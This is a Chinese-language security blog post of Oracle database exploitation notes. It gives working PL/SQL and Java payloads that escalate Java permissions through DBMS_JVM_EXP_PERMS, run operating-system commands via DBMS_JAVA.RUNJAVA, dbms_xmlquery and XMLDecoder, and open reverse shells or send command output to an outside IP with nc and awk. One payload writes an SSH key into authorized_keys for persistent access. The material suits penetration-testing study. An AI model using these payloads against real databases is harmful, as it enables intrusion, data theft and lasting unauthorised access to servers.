LFYSec

Oracle利用笔记

[TOC]

Oracle常见姿势备份

配置及连接

select javae(‘curl<>127.0.0.1’) from dual;

基本知识及信息搜集语句

连接

解锁scott用户:

1
2
alter user scott account unlock;
alter user scott identified by scott;

sqlplus scott/scott@localhost:1521/helowin
最后是service name,而不是数据库名。service name在$ORACLE_HOME/network/admin/tnsnames.ora

权限相关

Oracle权限控制分为用户、角色、权限,不通用户拥有不同角色,不同角色有不同权限。比较重要的是CREATE SESSION和CREATE PROCEDURE权限。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
- 查看oracle版本
select * from v$version;
- 查看当前连接用户是否为DBA
select userenv('ISDBA') from dual;
- 查看当前用户拥有的角色
select * from user_role_privs;
- 查看当前用户的角色的权限,比如有无create session和create procedure
select * from session_privs; / select * from role_sys_privs union select * from user_sys_privs;
- 查看有哪些DBA用户(需要DBA)
select * from dba_role_privs where granted_role='DBA';
- 查看用户拥有的角色(需要DBA)
select granted_role from dba_role_privs where grantee='SYSTEM';
- 查看某用户拥有的权限(需要DBA)
select privilege from dba_sys_privs where grantee in (select granted_role from dba_role_privs where grantee='SYSTEM' );
- 比较全的
https://www.cnblogs.com/qlqwjy/p/8404959.html

除此之外,oracle有一个oracle预定义的特殊用户叫PUBLIC,每个用户享有这个用户享有的所有权限。查询PUBLIC可以操作的包等权限的SQL语句如下,这可用于挖掘ORACLE某些包的漏洞。

1
2
select * from table_privileges s where s.grantee='PUBLIC' AND owner='SYS';
select * from dba_tab_privs where grantee='PUBLIC' AND owner='SYS';

利用

测试版本:
11.2.0.1.0
12.1.0.2.0

有CREATE SESSION无CREATE PROCEDURE

10/11g

利用条件写的是 <= Oracle Database 11.1.0.7.0,然而我11.2.0.1.0一样打出来了。

DBMS_JAVA.RUNJAVA实现任意命令执行
  • Step1:获得FilePermission权限
1
2
3
4
5
6
7
8
9
10
11
12
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 
'GRANT',USER(),'SYS','java.io.FilePermission',
'<<ALL FILES>>','execute','ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
  • Step2:RCE
1
2
3
4
5
6
7
8
9
10
11
12
13
11g:
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper curl 139.199.203.253:1234') FROM DUAL;

10/11g:
在10g中没有DBMS_JAVA.RUNJAVA,因此用DBMS_JAVA_TEST.FUNCALL,但注意10g还需要获得RuntimePermission权限。11g中也可用这个。
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/usr/bin/bash','-c','/bin/ls|/usr/bin/nc 139.199.203.253 1234') FROM DUAL;

rce调用的是runtime.exec,没法用$ `,执行命令需要/bin/ls这样,不知道为啥bash -i不行,而且很多情况下没/dev/tcp,因此没法直接bash弹shell:
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper awk "BEGIN{s=\"/inet/tcp/0/139.199.203.253/1234\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}"') FROM DUAL;
或者
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper nc -e /usr/bin/bash 139.199.203.253 1234') FROM DUAL;
或者这样带外
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /usr/bin/bash -c "/bin/ls|/usr/bin/nc 139.199.203.253 1234"') FROM DUAL;
dbms_xmlquery实现任意代码执行

DBMS_EXPORT_EXTENSION也可以,大同小异而且影响版本相同,这里只写着一个

  • Step1: 创建java代码执行包
1
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
  • Step2:获得RuntimePermission和java.io.FilePermission权限从而任意代码执行
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
  • Step3:获得RCE函数
1
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
  • Step4:RCE
1
select LinxRUNCMD('whoami') from dual;

有CREATE PROCEDURE权限

10/11g

有create procedure直接创建存储过程一把梭就好。

  • Step1:获得FilePermission权限
1
2
3
4
5
6
7
8
9
10
11
12
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 
'GRANT',USER(),'SYS','java.io.FilePermission',
'<<ALL FILES>>','execute','ENABLED' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
  • Step2:RCE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
{
    public static String execCommand(String command) throws IOException, InterruptedException {
        Runtime rt = Runtime.getRuntime();
        int bufSize = 4096;
        byte buffer[] = new byte[bufSize];
        String rc = "";
        int len;
        try{
            Process p = rt.exec(command);
            BufferedInputStream bis =
                    new BufferedInputStream(p.getInputStream(), bufSize);
            while ((len = bis.read(buffer, 0, bufSize)) != -1){
                rc += new String(buffer).split("\0")[0];;
            }
            bis.close();
            p.waitFor();
            return rc;
        } catch (Exception e) {
            rc = e.getMessage();
        }
        finally
        {
            return rc;
        }
    }
}
/
create or replace
function javae(p_command in varchar2) return varchar2
as
language java
name 'oraexec.execCommand(java.lang.String) return String';
/

然后select javae(‘whoami’) from dual;

12c

创建存储过程和之前一样,但是FilePermission加不上了。。
目前12c可以的利用方式只有xmldecoder,并且只能写文件,rce还是会FilePermission。xmldecoder的方式11-12通杀。

  • Step1
1
2
3
4
5
6
7
8
9
10
11
12
13
create or replace and compile java source named Decode as
import java.io.*;
import java.beans.*;
public class Decode{
    public static void input(String xml) throws InterruptedException, IOException {
      XMLDecoder decoder = new XMLDecoder(new ByteArrayInputStream(xml.getBytes()));
      decoder.readObject();
    }
}
;
/
CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS language java name 'Decode.input(java.lang.String)';
/
  • Step2:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
RCE:
BEGIN
  decodeme('
  <java class="java.beans.XMLDecoder">
   <java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
            <void index="0">
                <string>/bin/bash</string>
            </void>
            <void index="1">
                <string>-c</string>
            </void>
            <void index="2">
                <string>/bin/ls>/tmp/1</string>
            </void>
        </array>
        <void method="start"/>
    </object>
</java>
  </java>');
END;
/

写文件:
BEGIN
   decodeme('
    <java class="java.beans.XMLDecoder">
       <object class="java.io.FileWriter">
          <string>/home/oracle/.ssh/authorized_keys</string>
          <boolean>True</boolean>
          <void method="write">
             <string>ssh-rsa AA...</string>
          </void>
          <void method="close" />
       </object>
    </java>');
END;
/

各种非正常报错解决

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Q1:
ORA-29516: Aurora assertion failure: Assertion failure at joez.c:3311
Bulk load of method java/lang/Object.<init> failed; insufficient shm-object space
S1: 
关闭JIT: alter system set JAVA_JIT_ENABLED=FALSE scope=both;

Q2:
Java call terminated by uncaught Java exception:
java.security.AccessControlException: the Permission (java.io.FilePermission
<<ALL FILES>> execute) has not been granted to SCOTT. The PL/SQL to grant this
is dbms_java.grant_permission( 'SCOTT', 'SYS:java.io.FilePermission', '<<ALL
FILES>>', 'execute' )
S2:
无FilePermission,使用上面添加FilePermission的语句加一下即可。查看用户Java权限加上了没:
select * from user_java_policy where grantee_name='SCOTT';

还没用到的tips

ojvmjava

发现一个好玩的工具:
https://docs.oracle.com/en/database/oracle/oracle-database/12.2/jjdev/ojvmjava-tool.html#GUID-CB39F5B7-E985-4DB8-874C-2C1A4C16CD0F

利用:

1
2
3
4
连接:
ojvmjava -thin -user system@localhost:1521:xe
加载class:
loadjava -r -user scott@localhost:1521:xe World.class

执行:没java权限一样gg

odat

集成工具:
https://github.com/quentinhardy/odat

schedule还挺好用,不过需要的版本有点老:

1
python3 odat.py dbmsscheduler -s 127.0.0.1 -d helowin -U system -P helowin --exec "/usr/bin/curl vps"
漏洞调试

Proudly powered by Hexo and Theme by Hacker
© 2023 LFY